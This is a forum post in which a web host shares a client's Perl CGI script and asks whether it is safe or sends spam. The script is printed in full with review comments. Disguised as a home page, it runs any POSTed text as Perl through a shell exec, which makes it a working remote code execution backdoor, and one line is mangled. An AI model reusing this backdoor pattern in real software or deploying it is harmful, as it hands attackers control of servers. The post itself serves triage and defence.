CGI Script

Hello, I got a new client here; he's running a CGI script. He says it checks cgi-bin. It was using high CPU.
Here's some of the code:
#!/usr/bin/perl

#-----------------------------------------------------------------------------
#
# mypage.cgi - Just a simple script to put up a simple home page...
#
# Version Date Comments
# 0.1 07/06/00 Initial version
# 0.2 07/07/00 Modify to accept input from STDIN (post data)
# 0.3 07/08/00 Fix fork to leave child as a daemon
# 0.4 07/09/00 Add code to check back doors and ensure only one is running
# 0.5 07/10/00 Adjust output to make DP happy.
# 0.6 07/11/00 Add support for submit3 script
# 1.0 10/07/00 Simplify to just fork a child with the code uploaded.
# 1.1 10/21/00 Add code to grab IP address from poster and pass to fork.
# 1.2 10/25/00 Return cgi_to_ctrl_post structure instead of OK= ASCII stuff
# 1.3 01/02/01 Send IP of poster as parameter to fork if incoming IP = 0.0.0.0
#
#-----------------------------------------------------------------------------

use POSIX qw(setsid);
use Socket;

# Initialize Constants
#
# Status and command codes, assigned as package globals (there is no
# "use strict" in the portion shown). Only $C_THREAD_STARTED_CMD is
# referenced in this listing (by PrintStatus); the rest are unused here.
# NOTE(review): the names (MAIL_DONE, MAIL_SPEC, NEW_SERVER, AVAIL_IPS)
# look like the command set of a remotely controlled mailer -- inferred from
# the names only, not confirmed by any code shown.

# NOTE(review): $C_OK and $C_INVALID_SITEID share the value 1000.
$C_OK = 1000;
$C_INVALID_SITEID = 1000;
$C_SERVER_TIMEOUT = 1001;
$C_SERVER_IS_SLOW = 1002;

$C_THREAD_STARTED_CMD = 2000; # Set ulSiteID to 0
$C_MAIL_DONE_CMD = 2001;
$C_MAIL_SPEC_CMD = 2002;
$C_NEW_SERVER_CMD = 2003;
$C_AVAIL_IPS_CMD = 2004;

# Buffer for the raw POST body; file-scoped, so the subs below can read it.
my $InRawData = 0;

# Main request flow.
#
# Security summary: a GET request only shows a harmless-looking home page,
# while a POST request has its body handed to ForkIt(), which runs it with
# "perl -e". No authentication, origin check, or validation of the body is
# visible in the portion shown, so any client that can reach this URL can run
# code as the web-server user. The version history at the top of the file
# describes the same design ("fork a child with the code uploaded").
#
# For triage: look for POST requests to this script in the web-server access
# log, and for perl processes that outlive the CGI request that started them.

# First get data passed in to the CGI

if ($ENV{'REQUEST_METHOD'} eq "POST")
{
# The read length comes straight from the client-supplied Content-Length;
# no upper bound is applied.
read (STDIN, $InRawData, $ENV{'CONTENT_LENGTH'});
}
elsif ($ENV{'REQUEST_METHOD'} eq "GET")
{
DisplayPage();
exit(0);
}
else # Someone is messing with us, we only expect POST or GET
{
PrintError();
exit(0);
}

# Pull out special flags if Proxy added info
#
# If the body contains a <-=!=->...<-=!=-> section, the markers are stripped
# and the enclosed text is kept, preceded by a space. The enclosed text is not
# checked to be an IP address.

if (!($InRawData =~ s/<-=!=->(.*)<-=!=->/ $1/))
{
$InRawData .= " $ENV{'REMOTE_ADDR'}"; # no proxy, append sender's IP address
}

# The request body, still entirely client-controlled, is executed here.
$Status = ForkIt ($InRawData);

PrintStatus($Status); # send back the status

exit(0);

sub PrintError
{
    # Emit the "Invalid Invocation" HTML page for requests that are neither
    # POST nor GET. The page echoes REMOTE_ADDR and the file-scoped
    # $InRawData buffer without HTML escaping.
    my @page = (
        "Content-type: text/html\n\n",
        "<html>\n<head><title>Invalid Invocation</title></head>\n",
        "<body>\n",
        "<br><center>You are coming from IP $ENV{'REMOTE_ADDR'}<BR>",
        "<br>Buffer = $InRawData<br>",
        "<br>Please stop messing around with this CGI!<br>\n",
        "</body></html>\n\n",
    );

    print join('', @page);

    return;
}

sub PrintStatus
{
# Send an 8-byte binary reply: a 32-bit command code followed by a 32-bit
# site-ID field, both packed with "N" (big-endian unsigned).
# Takes the status string returned by ForkIt.
# NOTE(review): a binary application/octet-stream reply suggests the intended
# client is a controller program rather than a browser -- inferred, confirm.
my $InStatus = shift;
my $ulSiteID = 0;

# Create cgi_to_ctrl_post structure for return

my $ulCmd = pack "N", $C_THREAD_STARTED_CMD;

if ($InStatus eq "OK=Success")
{
$ulSiteID = pack "N", 0;
}
else
{
# NOTE(review): \xFFFF is not a hex literal outside a string. Without
# "use strict" it appears to parse as a reference to the bareword xFFFF, so
# the packed value would be derived from a memory address rather than a fixed
# constant. 0xFFFF or 0xFFFFFFFF was presumably intended -- confirm.
$ulSiteID = pack "N", \xFFFF;
}

print "Content-type: application/octet-stream\n\n";
print "$ulCmd$ulSiteID";

return;
}

sub ForkIt
{
# Fork a detached child that runs the supplied text as Perl code.
#
# Argument: $ForkData -- in this script, the raw POST body plus an appended
#           address string, passed in by the main flow.
# Returns:  "OK=Success" in the parent as soon as fork succeeds, or
#           "ERROR=Fork failed - <error text>" when fork fails for a reason
#           other than process exhaustion.
#
# Security: this is the code-execution sink of the script. Whatever the
# client sent is interpolated, unquoted, into a command string for exec.
my $ForkData = shift;
my $ReturnStatus = 0;

FORK:

{
# $pid and $NewSID are undeclared package globals (no "use strict" shown).
if ($pid = fork)
{
# Parent: report success immediately; the child is never waited for.
return ("OK=Success");
}
elsif (defined $pid) # second level child code
{
# NOTE(review): the next line is garbled as posted and is not valid Perl.
# Given "use POSIX qw(setsid)" at the top of the file, it was presumably a
# setsid() call that detaches the child into its own session; the forum
# software seems to have mangled the text.
$NewSID = POSIX:CGI Scriptetsid();

# close STD file handles so parent can die peacefully

close STDIN;
close STDOUT;
close STDERR;
# Single-string exec: Perl passes the string to the shell when it contains
# shell metacharacters, so $ForkData can inject shell commands as well as
# supply the Perl code given to -e. Nothing here quotes or filters it.
exec "perl -e $ForkData"; # launch script
# Reached only if exec itself fails.
exit(0)
}
elsif ($! =~ /No more process/)
{
# fork failed for lack of process slots: wait 5 seconds and retry, with no
# limit on the number of retries.
sleep 5;
redo FORK;
}
else
{
$ReturnStatus = "ERROR=Fork failed - $!";
}
}
return ($ReturnStatus);
}

sub DisplayPage
{
    # Emit the static "My Home Page" HTML shown to GET requests. The only
    # dynamic value is the caller's REMOTE_ADDR.
    my $header = "Content-type: text/html\n\n";
    my $head   = "<html>\n<head><title>My Home Page</title></head>\n";
    my $body   = "<body>\n"
               . "<H1><center>Welcome to my Home Page!</H1>"
               . "<br>I'm still working on it but I know that you are coming from IP $ENV{'REMOTE_ADDR'}<BR>";
    my $footer = "</body></html>\n\n";

    print $header, $head, $body, $footer;

    return;
}

I got a report from another company that this guy has been using mail scripts. Any ideas whether this is a safe script, or whether this guy is attempting to send spam?
Thanks,
Reddrake

 

 

 

 
